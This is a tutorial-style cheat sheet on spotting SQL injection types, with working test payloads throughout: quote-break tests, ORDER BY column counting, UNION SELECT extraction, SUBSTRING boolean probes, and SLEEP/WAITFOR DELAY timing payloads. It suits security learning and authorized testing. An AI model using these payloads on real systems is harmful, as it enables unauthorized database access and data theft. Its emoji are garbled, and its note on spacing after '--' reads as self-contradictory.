Sql Injection Type Identification

πŸ§ͺ 1. Error-Based SQL Injection

#Error_Based

Goal: See if the database reveals errors when you inject bad syntax or invalid queries.

πŸ”Ž Test Payload:

?id=1'

If this triggers a database error like:

You have an error in your SQL syntax

or:

Unclosed quotation mark after the character string

🎯 We are dealing with an Error-Based SQLi.

πŸ§ͺ 2. Union-Based SQL Injection

#Union_Based

Goal: Test whether you can use UNION SELECT to retrieve data.

πŸ”Ž Step-by-step:

Step 1 – Test number of columns:

?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
?id=1 ORDER BY 3--

If increasing the number eventually gives an error, that’s your column count.

Step 2 – Inject UNION:

?id=1 UNION SELECT 1,2,3--

Step 3 – Replace numbers with test data:

?id=1 UNION SELECT database(), null, null--

🎯 If the result appears on the page, it’s a Union-Based SQLi.

πŸ§ͺ 3. Blind SQL Injection (Boolean-Based)

#Blind

Goal: No output is shown, but behavior of the page changes depending on true/false conditions.

πŸ”Ž Test Payloads:

?id=1 AND 1=1--  β†’ page loads normally
?id=1 AND 1=2--  β†’ page behaves differently (blank, error, etc.)

If you can infer data from page behavior (but not from output), it’s:

🎯 A Blind SQL Injection.

You can start asking yes/no questions like:

?id=1 AND SUBSTRING(database(),1,1)='m'--

πŸ•’ 4. Time-Based Blind SQL Injection

#Time_Based

Goal: The page does not behave differently, but you can detect delays based on your query.

πŸ”Ž Test Payloads:

For MySQL:

?id=1' AND SLEEP(5)--

For MSSQL:

?id=1'; WAITFOR DELAY '0:0:5'--

If the page takes 5+ seconds to respond, then the injection is working.

You can now ask blind/time-based questions like:

?id=1' AND IF(SUBSTRING(database(),1,1)='m', SLEEP(5), 0)--

🎯 This is Time-Based Blind SQLi.

🧠 Summary Table

TypeBehavior / SymptomSample Payload
Error-BasedError message on page' or AND 1=CAST(database() AS INT)--
Union-BasedInjected data appears on pageUNION SELECT 1,2,database()--
BlindPage behavior changes with true/false conditionsAND 1=1-- vs AND 1=2--
Time-BasedResponse delay when condition is trueAND SLEEP(5)--

βœ… YES β€” UNION is for seeing data.

πŸ”Ή UNION-based SQL Injection is used when:

  • You can inject UNION SELECT.

  • The page displays the output (like table rows, product names, etc.).

  • You can control or view the query result in the browser.

πŸ’‘ Goal: Use UNION SELECT to combine your data with the original query and display it.

❌ Errors don’t always mean UNION is possible.

πŸ”Ή Error-based SQL Injection means:

  • The database error messages are shown.

  • You can sometimes leak data through error messages.

  • But you might not be able to use UNION SELECT if:

    • The app doesn’t return query results in the response.

    • The number/type of columns can’t be matched.

    • Output is filtered or hidden.

🧠 How They Relate:

ObservationWhat It Means
πŸ”΄ Error shows upSQL Injection might be possible (Error-based).
🟑 Can control outputTry UNION SELECT (Union-based SQLi).
βœ… See your data on pageYou’ve got Union-based SQLi.
❌ No output, just behaviorUse Blind or Time-based SQLi.

πŸ” Example Workflow:

  1. Inject ' β†’ See error? βœ… β†’ Error-based possible.

  2. Try UNION SELECT 1,2,3-- β†’ See output? βœ… β†’ UNION-based confirmed.

  3. No output? Try AND 1=1-- vs AND 1=2-- β†’ Different response? β†’ Blind SQLi.

  4. No difference? Try AND SLEEP(5)-- β†’ Page delayed? β†’ Time-based SQLi.

Comments

Knowing where and how to insert ' and -- in your SQL injection payload is key to successfully testing and exploiting the vulnerability.

🧭 1. Understand the Parameter Format

Let’s say the URL or parameter looks like this:

http://example.com/mail-list?id=1

You want to inject into the SQL query that runs behind the scenes. You need to test where your input lands in the SQL statement.

πŸ›‘ 2. Use -- to Comment Out the Rest

The -- tells the database to ignore the rest of the query (used to terminate the SQL statement cleanly).

Example:

?id=1'--

or

?id=1' AND 1=1--

Use a space after -- to ensure proper commenting:
βœ… --
❌ --

πŸ“Œ Summary

ActionPayload Example
Detect injection?id=1'
Comment out safely?id=1'--
ORDER BY test?id=1 ORDER BY 1--
Boolean test?id=1 AND 1=1-- vs ?id=1 AND 1=2--
UNION test?id=1 UNION SELECT 1,2--